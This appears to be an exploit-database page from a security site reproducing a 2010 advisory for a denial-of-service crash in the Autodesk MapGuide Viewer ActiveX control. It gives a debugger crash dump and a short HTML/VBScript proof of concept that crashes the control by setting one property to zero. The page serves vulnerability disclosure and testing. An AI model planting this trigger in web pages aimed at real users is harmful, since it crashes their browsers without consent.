首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Autodesk MapGuide Viewer ActiveX Denial of Service Vulnerability
来源:vfocus.net 作者:d3b4g 发布时间:2010-09-02  

 
# Exploit Title: Autodesk MapGuide Viewer ActiveX(MGAXCTRL.DLL)Overflow Vulnerability
# Date: [01-09-2010]
# Author: [d3b4g]
# Software Link: http://usa.autodesk.com/adsk/servlet/item?siteID=123112&id=9454821
# Version: [6.5]
# Tested on: [Winxp SP3]
# regards to ROL guys

 

 

Exception Code: ACCESS_VIOLATION
Disasm: 175CE9E CMP DWORD PTR [ESI+1C],0 (MGAXCTRL.DLL)

Seh Chain:
--------------------------------------------------
1  192847C  MGAXCTRL.DLL
2  73352542  VBSCRIPT.dll
3  7C839AD8  KERNEL32.dll

 

Registers:
--------------------------------------------------
EIP 0175CE9E
EAX 00000001
EBX 003EB690 -> 0193F684
ECX 00000000
EDX 003E0608 -> 00180F98
EDI 003EB5D8 -> 0193FC24
ESI 00000404
EBP 0013EA84 -> 0013EAA0
ESP 0013EA58 -> 003EB644

 

ArgDump:
--------------------------------------------------
EBP+8 003EB644 -> 0193F90C
EBP+12 00000000
EBP+16 0013EAD4 -> 00130000
EBP+20 0042C4F4 -> 00110024
EBP+24 0013EA94 -> 0013EAD4
EBP+28 0013EB30 -> 0013EBC0


Block Disassembly:
--------------------------------------------------
175CE8F POP ESI
175CE90 JMP [EAX+60]
175CE93 PUSH ESI
175CE94 LEA ESI,[ECX+404]
175CE9A TEST ESI,ESI
175CE9C JE SHORT 0175CEC2
175CE9E CMP DWORD PTR [ESI+1C],0   <--- CRASH
175CEA2 JE SHORT 0175CEC2
175CEA4 PUSH 0
175CEA6 PUSH DWORD PTR [ESP+C]
175CEAA MOV ECX,ESI
175CEAC PUSH 0
175CEAE CALL 01912C63
175CEB3 MOV EAX,[ESI]
175CEB5 MOV ECX,ESI

 

 

PoC:


<object classid='clsid:62789780-B744-11D0-986B-00609731A21D' id='target' />
<script language='vbscript'>

'File Generated by COMRaider v0.0.133 - http://labs.idefense.com

'Wscript.echo typename(target)

'for debugging/custom prolog
targetFile = "C:\Program Files\Autodesk\MapGuideViewerActiveX6.5\MgAxCtrl.dll"
prototype  = "Property Let LayersViewWidth As Long"
memberName = "LayersViewWidth"
progid     = "MGMapControl.MGMap"
argCount   = 1

arg1=0

target.LayersViewWidth = arg1

</script>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·TFTP Desktop 2.5 Directory Tra
·Cpanel PHP Restriction Bypass
·TFTPDWIN v0.4.2 Directory Trav
·QtWeb DLL hijacking (wintab32.
·Adobe Acrobat Reader and Flash
·Nimbuzz social messenger DLL h
·Leadtools ActiveX Common Dialo
·AnyBizSoft PDFtoWord DLL Hijac
·mBlogger v1.0.04 (viewpost.php
·MPLAB IDE .mcp .mcw DLL Hijack
·Novell Netware v6.5 OpenSSH Re
·Spybot-S&D blindman.exe DLL Hi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved